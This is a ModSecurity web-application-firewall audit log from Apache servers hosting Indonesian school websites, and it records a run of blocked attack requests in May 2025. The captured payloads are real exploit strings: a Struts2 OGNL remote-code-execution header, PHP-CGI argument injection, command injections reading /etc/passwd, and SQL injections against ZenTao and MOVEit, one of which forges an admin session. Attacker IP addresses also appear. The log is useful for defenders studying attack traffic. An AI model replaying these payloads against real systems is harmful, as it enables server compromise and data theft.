Profile/MIDP-2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --40212237-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40212237-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747921783389127 874 (- - -) Stopwatch2: 1747921783389127 874; combined=366, p1=325, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40212237-Z-- --4aea2a65-A-- [22/May/2025:21:17:41 +0700] aC8yBX0O04WKE1HJ5iR2PwAAAAs 103.236.140.4 59946 103.236.140.4 8181 --4aea2a65-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.59.12.181 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.59.12.181 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4aea2a65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4aea2a65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747923461895761 4556 (- - -) Stopwatch2: 1747923461895761 4556; combined=2330, p1=693, p2=1598, p3=0, p4=0, p5=38, sr=88, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4aea2a65-Z-- --e9e56950-A-- [22/May/2025:21:22:30 +0700] aC8zJn0O04WKE1HJ5iR2RAAAABU 103.236.140.4 59992 103.236.140.4 8181 --e9e56950-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091107 Firefox/3.5.5 Accept-Charset: utf-8 --e9e56950-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9e56950-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747923750915397 857 (- - -) Stopwatch2: 1747923750915397 857; combined=362, p1=323, p2=0, p3=0, p4=0, p5=39, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9e56950-Z-- --02bf473f-A-- [22/May/2025:21:43:03 +0700] aC8392friXjg62qQwE9nvwAAAIU 103.236.140.4 60510 103.236.140.4 8181 --02bf473f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 88.151.34.37 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 88.151.34.37 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --02bf473f-C-- --02bf473f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02bf473f-E-- --02bf473f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747924983753257 4844 (- - -) Stopwatch2: 1747924983753257 4844; combined=3097, p1=430, p2=2635, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02bf473f-Z-- --8660bd76-A-- [22/May/2025:21:49:25 +0700] aC85dSektx75wRFPQyj-_QAAANQ 103.236.140.4 60712 103.236.140.4 8181 --8660bd76-B-- POST /bsh.servlet.BshServlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 58 User-Agent: Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 168602622 --8660bd76-C-- bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw --8660bd76-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8660bd76-E-- --8660bd76-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /bsh.servlet.BshServlet"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747925365966804 1883 (- - -) Stopwatch2: 1747925365966804 1883; combined=598, p1=415, p2=150, p3=0, p4=0, p5=32, sr=69, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8660bd76-Z-- --d1f34f3d-A-- [22/May/2025:21:49:25 +0700] aC85dX0O04WKE1HJ5iR2WQAAAAI 103.236.140.4 60726 103.236.140.4 8181 --d1f34f3d-B-- POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 25 User-Agent: Mozilla/5.0 (Windows NT 11.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/110.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 160563299 --d1f34f3d-C-- type='|cat /etc/passwd||' --d1f34f3d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1f34f3d-E-- --d1f34f3d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /webadm/?q=moni_detail.do&action=gragh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747925365968446 2524 (- - -) Stopwatch2: 1747925365968446 2524; combined=790, p1=526, p2=223, p3=0, p4=0, p5=41, sr=98, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1f34f3d-Z-- --76794d65-A-- [22/May/2025:21:49:25 +0700] aC85dSektx75wRFPQyj-_gAAAME 103.236.140.4 60716 103.236.140.4 8181 --76794d65-B-- POST /portal/login_init.action HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Java/1.8.0_333 Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 Cache-Control: no-cache Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo 8yx7htwjwg').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} Pragma: no-cache X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 70845991 --76794d65-C-- --76794d65-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76794d65-H-- Message: Access denied with code 403 (phase 2). Match of "rx ^(?:\\w+\\/[\\w\\-\\.]+)(?:;(?:charset=[\\w\\-]{1,18}|boundary=[\\w\\-]+)?)?$" against "REQUEST_HEADERS:Content-Type" required. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "6743"] [id "243930"] [rev "2"] [msg "COMODO WAF: Remote code execution in Apache Struts versions 2.3.31 - 2.3.5 and 2.5 - 2.5.10 (CVE-2017-5638)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747925365967355 4313 (- - -) Stopwatch2: 1747925365967355 4313; combined=2965, p1=453, p2=2473, p3=0, p4=0, p5=38, sr=101, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76794d65-Z-- --f8db1163-A-- [22/May/2025:21:49:25 +0700] aC85deThJmFSRJ5-OZfeEAAAAEY 103.236.140.4 60724 103.236.140.4 8181 --f8db1163-B-- POST /zentao/user-login.html HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id/zentao/user-login.html Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 72 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/114.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 165938562 --f8db1163-C-- account=admin'+and++updatexml(1,concat(0x1,md5(999999999)),1)+and+'1'='1 --f8db1163-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8db1163-E-- --f8db1163-H-- Message: Access denied with code 403 (phase 2). Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at ARGS_POST:account. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: and '1'='1 found within ARGS_POST:account: admin' and updatexml(1,concat(0x1,md5(999999999)),1) and '1'='1"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747925365968440 3464 (- - -) Stopwatch2: 1747925365968440 3464; combined=1935, p1=480, p2=1432, p3=0, p4=0, p5=23, sr=85, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8db1163-Z-- --044af235-A-- [22/May/2025:22:04:00 +0700] aC884OThJmFSRJ5-OZfgxQAAAFY 103.236.140.4 38662 103.236.140.4 8181 --044af235-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15 Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyUsername: Guest X-siLock-SessVar1: MyPkgAccessCode: 123 X-siLock-SessVar2: MyGuestEmailAddr: my_guest_email@example.com X-siLock-Transaction: session_setvars X-Forwarded-For: 154.26.179.43 Cookie: siLockLongTermInstID=0; SenayanMember=5t1dvvd6160e6dmbg1qa9qhl40 X-Varnish: 159429942 --044af235-C-- --044af235-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --044af235-E-- --044af235-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747926240117544 3090 (- - -) Stopwatch2: 1747926240117544 3090; combined=1696, p1=433, p2=1238, p3=0, p4=0, p5=25, sr=61, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --044af235-Z-- --708a667e-A-- [22/May/2025:22:04:05 +0700] aC885Sektx75wRFPQygAZAAAAMc 103.236.140.4 38918 103.236.140.4 8181 --708a667e-B-- POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 0 User-Agent: python-requests/2.26.0 Accept: */* Ax-silock-transaction: folder_add_by_path X-siLock-SessVar0: MyPkgID: 0 X-siLock-SessVar1: MyPkgSelfProvisionedRecips: SQL Injection'); INSERT INTO activesessions (SessionID) values ('2xMkyuOd6a871djR3qUJHUPPvjy');UPDATE activesessions SET Username=(select Username from users order by permission desc limit 1) WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET LoginName='test@test.com' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET RealName='test@test.com' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET InstId='1234' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET IpAddress='154.26.179.43' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET LastTouch='2099-06-10 09:30:00' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET DMZInterface='10' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET Timeout='60' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET ResilNode='10' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy';UPDATE activesessions SET AcctReady='1' WHERE SessionID='2xMkyuOd6a871djR3qUJHUPPvjy'; -- asdf X-siLock-Transaction: session_setvars X-Forwarded-For: 154.26.179.43 Cookie: siLockLongTermInstID=0; SenayanMember=5t1dvvd6160e6dmbg1qa9qhl40 X-Varnish: 159430038 --708a667e-C-- --708a667e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --708a667e-E-- --708a667e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".dll"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747926245148991 3067 (- - -) Stopwatch2: 1747926245148991 3067; combined=1625, p1=465, p2=1129, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --708a667e-Z-- --ea772653-A-- [22/May/2025:22:06:06 +0700] aC89XuThJmFSRJ5-OZfi6QAAAFA 103.236.140.4 45156 103.236.140.4 8181 --ea772653-B-- POST /userentry?accountId=/../../../tomcat/webapps/ZpoYt/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 124 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/126.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 163517867 --ea772653-C-- xœ ðffábœŠ¼ð"AQN „…dœÃ\u ŒŒuMÌLÌôJ*JBC8˜Û§žcóK-­àf`dùÊÈÀÀ2¨:>Ä58„+À›‘IŽ—±`q &†-Pm–°B,A³ À›• ¢—‘!H‡‚M ?Ë --ea772653-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea772653-E-- --ea772653-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS_NAMES:x\x9c\v\xf0ff\xe1b\x00\x81\x9c\x8a\xbc\xf0"AQ\x0fN \x1b\x84\x85\x18d\x18\x9c\xc3\\u\x8d\x0c\x8c\x8cuM\xcc\x8dL\xcc\xf4J*JBC8\x19\x98\x1f\xdb\x05\xa7\x9ec\xf3K-\xad\xe0f`d\xf9\xca\xc8\xc0\xc0\x022\x01\xa8:>\xc458\x84 \xc0\x9b\x91I\x8e\x19\x97\xb1\x12`q\xa0 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS_NAMES:x\x5cx9c\x5cv\x5cxf0ff\x5cxe1b\x5cx00\x5cx81\x5cx9c\x5cx8a\x5cxbc\x5cxf0\x22AQ\x5cx0fN \x5cx1b\x5cx84\x5cx85\x5cx18d\x5cx18\x5cx9c\x5cxc3\x5c\x5cu\x5cx8d\x5cx0c\x5cx8c\x5cx8cuM\x5cxcc\x5cx8dL\x5cxcc\x5cxf4J*JBC8\x5cx19\x5cx98\x5cx1f\x5cxdb\x5cx05\x5cxa7\x5cx9ec\x5cxf3K-\x5cxad\x5cxe0f`d\x5cxf9\x5cxca\x5cxc8\x5cxc0\x5cxc0\x5cx022\x5cx01\x5cxa8:>\x5cxc458\x5cx84 \x5cxc0\x5cx9b\x5cx91I\x5cx8e\x5cx19\x5cx97\x5cxb1\x5cx12`q\x5cxa0=x\x9c\x0b\xf0ff\xe1b\x00\x81\x9c Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747926366150583 13817 (- - -) Stopwatch2: 1747926366150583 13817; combined=11122, p1=1829, p2=9239, p3=0, p4=0, p5=53, sr=87, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea772653-Z-- --8ad65349-A-- [22/May/2025:22:12:11 +0700] aC8-y30O04WKE1HJ5iR63wAAAAw 103.236.140.4 57140 103.236.140.4 8181 --8ad65349-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.24 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.24 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --8ad65349-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8ad65349-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747926731781371 812 (- - -) Stopwatch2: 1747926731781371 812; combined=330, p1=289, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ad65349-Z-- --bf538779-A-- [22/May/2025:22:15:29 +0700] aC8_kX0O04WKE1HJ5iR66QAAAAs 103.236.140.4 57230 103.236.140.4 8181 --bf538779-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.133.62.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.133.62.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --bf538779-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf538779-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747926929340289 2714 (- - -) Stopwatch2: 1747926929340289 2714; combined=1416, p1=444, p2=941, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf538779-Z-- --9d5ea850-A-- [22/May/2025:22:23:27 +0700] aC9Bbyektx75wRFPQygF4wAAANQ 103.236.140.4 57446 103.236.140.4 8181 --9d5ea850-B-- POST /K3Cloud/Kingdee.BOS.ServiceFacade.ServicesStub.User.UserService.SaveUserPassport.common.kdsvc HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 15909 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Content-Type: text/json cmd: echo QZPuWzkJnV X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 163522807 --9d5ea850-C-- 